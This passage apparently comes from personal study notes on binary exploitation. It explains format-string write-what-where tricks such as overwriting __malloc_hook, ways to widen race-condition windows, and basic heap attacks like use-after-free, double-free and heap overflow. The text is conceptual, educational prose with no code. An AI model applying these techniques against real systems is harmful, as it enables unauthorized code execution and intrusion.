684 | the same), `stdin`'s vtable pointer to `write` or `flush`, etc. In
685 | such a scenario, having access to the libc sources is extremely
686 | useful. As for overwriting the `__malloc_hook`, it works even if the
687 | application doesn't call `malloc`, since it is calling `printf` (or
688 | similar), and internally, if we pass a width specifier greater than
689 | 64k (say `%70000c`), then it will call malloc, and thus whatever
690 | address was specified at the global variable `__malloc_hook`.
691 | 
692 | If we have our format string **buffer not on the stack**, then we can
693 | still gain a **write-what-where** primitive, though it is a little
694 | more complex. First off, we need to stop using the position specifiers
695 | `n$`, since if this is used, then `printf` internally copies the stack
696 | (which we will be modifying as we go along). Now, we find two pointers
697 | that point _ahead_ into the stack itself, and use those to overwrite
698 | the lower order bytes of two further _ahead_ pointing pointers on the
699 | stack, so that they now point to `x+0` and `x+2` where `x` is some
700 | location further _ahead_ on the stack. Using these two overwrites, we
701 | are able to completely control the 4 bytes at `x`, and this becomes
702 | our **where** in the primitive. Now we just have to ignore more
703 | positions on the format string until we come to this point, and we
704 | have a **write-what-where** primitive.
705 | 
706 | ### Race Conditions & Exploiting Them
707 | 
708 | Written on 1st April 2017
709 | 
710 | > Influenced by [this](https://www.youtube.com/watch?v=kqdod-ATGVI)
711 | > amazing live stream by Gynvael Coldwind, where he explains about race
712 | > conditions
713 | 
714 | If a memory region (or file or any other resource) is accessed _twice_
715 | with the assumption that it would remain same, but due to switching of
716 | threads, we are able to change the value, we have a race condition.
717 | 
718 | Most common kind is a TOCTTOU (Time-of-check to Time-of-use), where a
719 | variable (or file or any other resource) is first checked for some
720 | value, and if a certain condition for it passes, then it is used. In
721 | this case, we can attack it by continuously "spamming" this check in
722 | one thread, and in another thread, continuously "flipping" it so that
723 | due to randomness, we might be able to get a flip in the middle of the
724 | "window-of-opportunity" which is the (short) timeframe between the
725 | check and the use.
726 | 
727 | Usually the window-of-opportunity might be very small. We can use
728 | multiple tricks in order to increase this window of opportunity by a
729 | factor of 3x or even up to ~100x. We do this by controlling how the
730 | value is being cached, or paged. If a value (let's say a `long int`)
731 | is not aligned to a cache line, then 2 cache lines might need to be
732 | accessed and this causes a delay for the same instruction to
733 | execute. Alternatively, breaking alignment on a page, (i.e., placing
734 | it across a page boundary) can cause a much larger time to
735 | access. This might give us higher chance of the race condition being
736 | triggered.
737 | 
738 | Smarter ways exist to improve this race condition situation (such as
739 | clearing TLB etc, but these might not even be necessary sometimes).
740 | 
741 | Race conditions can be used, in (possibly) their extreme case, to get
742 | ring0 code execution (which is "higher than root", since it is kernel
743 | mode execution).
744 | 
745 | It is possible to find race conditions "automatically" by building
746 | tools/plugins on top of architecture emulators. For further details,
747 | http://vexillium.org/pub/005.html
748 | 
749 | ### Types of "basic" heap exploits
750 | 
751 | Written on 31st Mar 2017
752 | 
753 | > Influenced by [this](https://www.youtube.com/watch?v=OwQk9Ti4mg4jjj)
754 | > amazing live stream by Gynvael Coldwind, where he is experimenting
755 | > on the heap
756 | 
757 | Use-after-free:
758 | 
759 | Let us say we have a bunch of pointers to a place in heap, and it is
760 | freed without making sure that all of those pointers are updated. This
761 | would leave a few dangling pointers into free'd space. This is
762 | exploitable by usually making another allocation of different type
763 | into the same region, such that you control different areas, and then
764 | you can abuse this to gain (possibly) arbitrary code execution.
765 | 
766 | Double-free:
767 | 
768 | Free up a memory region, and the free it again. If you can do this,
769 | you can take control by controlling the internal structures used by
770 | malloc. This _can_ get complicated, compared to use-after-free, so
771 | preferably use that one if possible.
772 | 
773 | Classic buffer overflow on the heap (heap-overflow):
774 | 
775 | If you can write beyond the allocated memory, then you can start to
776 | write into the malloc's internal structures of the next malloc'd
777 | block, and by controlling what internal values get overwritten, you
778 | can usually gain a read-what-where primitive, that can usually be
779 | abused to gain higher levels of access (usually arbitrary code
780 | execution, via the `GOT PLT`, or `__fini_array__` or similar).
781 | 


--------------------------------------------------------------------------------